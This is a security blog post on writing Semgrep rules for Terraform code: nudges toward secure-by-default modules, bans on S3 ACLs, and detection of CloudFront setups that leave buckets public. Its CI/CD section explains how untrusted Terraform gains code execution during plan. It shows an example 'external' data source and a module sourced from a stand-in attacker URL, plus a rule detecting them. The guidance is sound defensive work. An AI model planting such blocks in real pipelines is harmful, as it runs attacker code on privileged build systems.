Semgrep for Terraform Security
Apr 29, 2024
I’m a bit of a Semgrep fanboy
When I first tried it out in my consulting days, it was such a relief to find a SAST tool that was fast, didn’t require building the code, was extensible, and came with a solid set of default rules. It quickly replaced language-specific SAST tools like bandit and nodejsscan, as it subsumed their rule sets.
I’m also an Infrastructure as Code fanboy
I started using Terraform seriously in 2019, around version 0.12. My first open source project, sadcloud, used Terraform to stand up (and tear down) insecure infrastructure. Having everything managed as code has made infrastructure security more practical, especially in a startup environment.
Semgrep is good for Terraform Security
Secure-by-default modules
One approach to killing bug classes in Terraform is to replace the overly flexible default modules with custom, secure-by-default ones.
Example 1: secure-bucket
S3 bucket leaks are the most common major AWS security incident. They’re so common, I’ve given up tracking them in my repository of aws-customer-security-incidents! In addition to making the bucket private (which is now the default 😌), there are security optimizations around Encryption, Versioning, Block Public Access, and Logging.
It’s common for companies to have a wrapper module for all this configuration, to make it easy for engineers to get a bucket deployed without dozens of lines of non-DRY configuration.
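As a rough sketch of what such a wrapper might contain (assuming AWS provider v4 or later, where these settings are separate resources), the module body could look something like this. The variable names and the choice of KMS encryption are my illustrative assumptions, not a canonical implementation:

```hcl
# Hypothetical internals of a secure-bucket wrapper module.
# Variable names and defaults are assumptions for illustration.
variable "name" {
  type        = string
  description = "Bucket name"
}

variable "log_bucket" {
  type        = string
  description = "Name of an existing bucket that receives access logs"
}

resource "aws_s3_bucket" "this" {
  bucket = var.name
}

# Block Public Access: all four switches on.
resource "aws_s3_bucket_public_access_block" "this" {
  bucket                  = aws_s3_bucket.this.id
  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

# Encryption at rest with KMS.
resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  bucket = aws_s3_bucket.this.id

  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "aws:kms"
    }
  }
}

# Versioning, so overwrites and deletes are recoverable.
resource "aws_s3_bucket_versioning" "this" {
  bucket = aws_s3_bucket.this.id

  versioning_configuration {
    status = "Enabled"
  }
}

# Server access logging to a separate bucket.
resource "aws_s3_bucket_logging" "this" {
  bucket        = aws_s3_bucket.this.id
  target_bucket = var.log_bucket
  target_prefix = "${var.name}/"
}
```

That is five resources an engineer would otherwise have to remember and repeat for every bucket.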
Example 2: safe-proxy-access
Most companies build up a set of internal applications. Attackers have a history of using these as a foothold. A good first step is to not have them accessible publicly - often by putting them behind an identity aware proxy. This can take a fair bit of configuration (ALB, Cognito, Okta, etc.). By bundling this as a single module, it can be offered as a pluggable service.
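To give a flavor of the configuration involved, here is a minimal sketch of the piece such a module might center on: an ALB listener that forces an OIDC login before forwarding traffic. The variable names are hypothetical, and a real module would also manage the load balancer, target group, DNS, and the identity provider side:

```hcl
# Sketch of the core of a hypothetical safe-proxy-access module.
# All variable names are assumptions for illustration.
variable "alb_arn" {
  type = string
}

variable "certificate_arn" {
  type = string
}

variable "target_group_arn" {
  type = string
}

variable "oidc" {
  type = object({
    issuer                 = string
    authorization_endpoint = string
    token_endpoint         = string
    user_info_endpoint     = string
    client_id              = string
    client_secret          = string
  })
  sensitive = true
}

resource "aws_lb_listener" "https" {
  load_balancer_arn = var.alb_arn
  port              = 443
  protocol          = "HTTPS"
  certificate_arn   = var.certificate_arn

  # First action: require a valid login with the identity provider.
  default_action {
    type = "authenticate-oidc"

    authenticate_oidc {
      issuer                 = var.oidc.issuer
      authorization_endpoint = var.oidc.authorization_endpoint
      token_endpoint         = var.oidc.token_endpoint
      user_info_endpoint     = var.oidc.user_info_endpoint
      client_id              = var.oidc.client_id
      client_secret          = var.oidc.client_secret
    }
  }

  # Second action: only authenticated requests reach the application.
  default_action {
    type             = "forward"
    target_group_arn = var.target_group_arn
  }
}
```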
Use Semgrep to evangelize secure-by-default modules
Okay, so you have a whole set of great modules, but you’ll still hit a roadblock: discovery!
How is that new employee going to know to use secure-bucket? I mean, yes, it’s on page 13 of onboarding, but that was post-lunch and they were a little sleepy.
Semgrep is great here! You just write a simple rule:
rules:
  - id: raw-s3-resource
    pattern: |
      resource "aws_s3_bucket" "$X" {
        ...
      }
    languages:
      - hcl
    severity: WARNING
    message: |
      Hi! It looks like you're using a raw S3 resource.
      We recommend you instead use `secure-bucket`.
      Visit go/secure-bucket for details!
Then, you add that rule to your CI/CD checks, and developers will get a message on their PRs. This is a soft nudge that leaves room for deviation, while prodding people to the paved road!
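For illustration, the paved-road alternative that the message points to might be as short as the call below. The module path and input names are hypothetical and would depend on how your module is published:

```hcl
# Hypothetical call to a secure-bucket module.
# The source path and input names are assumptions.
module "reports_bucket" {
  source     = "../modules/secure-bucket"
  name       = "acme-reports"
  log_bucket = "acme-access-logs"
}
```

One practical wrinkle: the module itself has to declare a raw aws_s3_bucket somewhere, so you will probably want to exclude the module's own directory from this rule, for example with the rule-level `paths` / `exclude` option.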
Semgrep for opinionated rules
In addition to “nudges,” you can implement hard guardrails and invariants using Block mode.
With Terraform, this can also be used to force explicit choices over implicit defaults, which helps highlight critical configuration elements. For example, you want all Load Balancers to be explicitly “internal” or “external”:
rules:
  - id: lb-explicit-internal-external
    patterns:
      - pattern: |
          resource "aws_lb" "$Z" {
            ...
          }
      - pattern-not: |
          resource "aws_lb" "$X" {
            ...
            internal = $Y
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: You must explicitly set the `internal` argument to true or false.
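As a quick sanity check, here is a pair of resources I would expect this rule to treat differently. The resource and variable names are made up for the example, and I have not run this exact file through Semgrep, so treat it as a test fixture to start from:

```hcl
# Hypothetical inputs, declared so the snippet stands alone.
variable "public_subnet_ids" {
  type = list(string)
}

variable "private_subnet_ids" {
  type = list(string)
}

# Expected to be flagged: `internal` is omitted, so the provider
# default (false, i.e. internet-facing) silently applies.
resource "aws_lb" "implicit" {
  name               = "implicit-lb"
  load_balancer_type = "application"
  subnets            = var.public_subnet_ids
}

# Expected to pass: the choice is spelled out and reviewable.
resource "aws_lb" "explicit" {
  name               = "explicit-lb"
  internal           = true
  load_balancer_type = "application"
  subnets            = var.private_subnet_ids
}
```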
Or, if you want to ban S3 ACLs (given they’re messy, and deprecated, and gross), just do:
rules:
  - id: s3-acls
    pattern-either:
      - pattern: |
          resource "aws_s3_bucket_acl" "$Z" {
            ...
          }
      - pattern: |
          resource "aws_s3_bucket" "$X" {
            ...
            acl = "$Y"
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: S3 ACLs are deprecated and may not be used. See go/s3-acls
Use Semgrep to secure your CI/CD
At a certain scale, you need to start applying your Terraform centrally, through an automated CI/CD system. Atlantis is the most popular open source offering. I’ve also used and enjoyed Spacelift, and of course there is always Terraform Cloud.
Applying TF via CI/CD improves security: developers no longer need privileged access locally, you can enforce code review, and you can run those CI/CD configuration scans!
But there is a major risk: running a terraform plan on untrusted code can lead to remote code execution.
Some ways an attacker can execute code if they can run a plan:
- Import a malicious provider, which runs the payload on init
- Use the external data source to run code directly
- Or, do either indirectly by loading an external module
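To make the last two concrete, here is roughly what they look like in a pull request. The payload is a harmless stand-in and the module URL is a placeholder, not a real repository:

```hcl
# Illustrative only: a harmless stand-in for an attacker's payload.
data "external" "poc" {
  # The program runs when the data source is read during `terraform plan`.
  # It must print a JSON object to stdout; everything before that is the payload.
  program = ["sh", "-c", "id >&2; echo '{}'"]
}

# The indirect variant: the same block hidden inside a remote module,
# so it never appears in the diff under review. Placeholder URL.
module "innocent_looking" {
  source = "git::https://example.com/attacker/terraform-module.git"
}
```

The indirect variant is part of why pattern matching on the repository's own files is brittle: the dangerous block lives in code that is only fetched at init time.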
So, before running any Terraform commands, you can first use Semgrep to attempt (brittle!) detection of these patterns. On any match, you could alert the security team, notify the user, or take whatever steps are appropriate in your organization.
rules:
  - id: ban-external-provider
    pattern: |
      data "external" "$Z" {
        ...
      }
    languages:
      - hcl
    severity: ERROR
    message: The external provider is not allowed, as it can be used to execute code during TF plans
Of course, the same is possible (and maybe better) using OPA and conftest, but there are benefits to using Semgrep here:
- the syntax is homogeneous with your other SAST
- you can leverage the same integrations
- you can run the exact same rules at PR time and pre-Plan to provide an improved developer experience
Write custom rules, catch subtle bugs
Shoehorning this in, because I love it. A lot of the current registry rules, as with any security tool, are mostly about “CIS Benchmark” misconfigurations - think: encryption or logging disabled. But SAST really delivers a flywheel of value when you take real findings and turn them into scalable rules.
Here’s one example of a confusing footgun I’ve seen go off:
- It’s common to put CloudFront in front of S3
- By setting up either origin access identity (OAI) or origin access control (OAC), you can limit access to the bucket to only come from CloudFront
- If you do this with a private bucket, all the objects are now publicly accessible via CloudFront unless you configure a signer, which then limits access to objects only to signed URLs
- This is well marked (“Restrict viewer access”) in the UI. But in Terraform, it’s easy to miss that this “toxic combination” of settings makes a bucket public.
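Here is a trimmed-down sketch of that combination in Terraform, using OAC. The resource names and variables are hypothetical, and the bucket policy that grants CloudFront read access is omitted for brevity:

```hcl
# Hypothetical inputs, declared so the snippet stands alone.
variable "bucket_regional_domain_name" {
  type = string
}

variable "cache_policy_id" {
  type = string
}

resource "aws_cloudfront_origin_access_control" "s3" {
  name                              = "s3-oac"
  origin_access_control_origin_type = "s3"
  signing_behavior                  = "always"
  signing_protocol                  = "sigv4"
}

resource "aws_cloudfront_distribution" "docs" {
  enabled = true

  # The private bucket is the origin, reachable only through CloudFront.
  origin {
    domain_name              = var.bucket_regional_domain_name
    origin_id                = "s3-private"
    origin_access_control_id = aws_cloudfront_origin_access_control.s3.id
  }

  default_cache_behavior {
    target_origin_id       = "s3-private"
    viewer_protocol_policy = "redirect-to-https"
    allowed_methods        = ["GET", "HEAD"]
    cached_methods         = ["GET", "HEAD"]
    cache_policy_id        = var.cache_policy_id
    # Nothing here requires signed URLs (no trusted_key_groups or
    # trusted_signers), so any viewer can fetch any object.
  }

  restrictions {
    geo_restriction {
      restriction_type = "none"
    }
  }

  viewer_certificate {
    cloudfront_default_certificate = true
  }
}
```

Nothing in this file says "public", which is exactly the problem. Note also that in the AWS provider, trusted_key_groups and trusted_signers are set per cache behavior (inside default_cache_behavior or ordered_cache_behavior), not at the top level of the distribution, so any rule matching on them needs to account for that nesting.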
So, we can write a Semgrep rule that checks for any aws_cloudfront_distribution that is fronting S3 (has s3_origin_config or origin_access_control_id) but isn’t set up to require signing (has neither trusted_signers nor trusted_key_groups). Here’s a messy first pass:
rules:
  - id: public-s3-via-cloudfront
    patterns:
      - pattern-either:
          - pattern: |
              resource "aws_cloudfront_distribution" "$Z" {
                origin {
                  ...
                  s3_origin_config {
                    ...
                  }
                }
                ...
              }
          - pattern: |
              resource "aws_cloudfront_distribution" "$Z" {
                origin {
                  ...
                  origin_access_control_id = $W
                }
                ...
              }
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            trusted_signers = $Y
            ...
          }
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            trusted_key_groups = $Y
            ...
          }
    languages:
      - hcl
    severity: WARNING
    message: |
      This will make the S3 bucket accessible publicly via Cloudfront.
      Please either set up a signer or confirm all objects are public.
This is a case where there may be an intentional business reason for the configuration, but the misconfiguration is subtle enough and high-risk enough to warrant explicit in-line guidance to developers. If you’re using a secure-bucket pattern consistently, you could refine this rule further to detect references to a bucket created with the private bucket module.
Alternatives for Terraform Security
Alternatives for Terraform Security definitely exist. OPA and conftest were mentioned above, and checkov is also a frequent recommendation. Semgrep is easy to get started with, but check out these references and research for a broader survey on SAST for Terraform!
References
- GitLab - Fantastic Infrastructure as Code security attacks and how to find them
- Marco Lancini - Semgrep for Cloud Security
- Christophe Tafani-Dereeper - Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues
- Albert Heinle - The Current State of Infrastructure as Code (IaC) from a Security Standpoint
- Frans van Buul - Everything-as-Code: Pushing the boundaries of SAST
- Serhii Vasylenko - A Deep Dive Into Terraform Static Code Analysis Tools: Features and Comparisons
Research on SAST for Infrastructure as Code
Jan 2022: A Large-Scale Study on the Security Vulnerabilities of Cloud Deployments
- Ran tfsec, terrascan and checkov against 8256 public repositories containing AWS TF, resulting in 292538 security violations
- The most common issues found are Encryption, Access control, and Insecure defaults
Aug 2023: Exploring Security Practices in Infrastructure as Code: An Empirical Study
- Ran checkov against 800 recently active projects that contain some Terraform code
- “Our findings indicate that IaC configuration poses a major risk and confirm that, despite the availability of security scanning tools, there is a lack of adoption of best practices in open-source projects”
Nov 2023: Security Vulnerabilities in Infrastructure as Code: What, How Many, and Who?
- Ran Snyk and Horusec against the source code of 7 IaC tools and that of over 1,600 Infrastructure as Code scripts and add-ons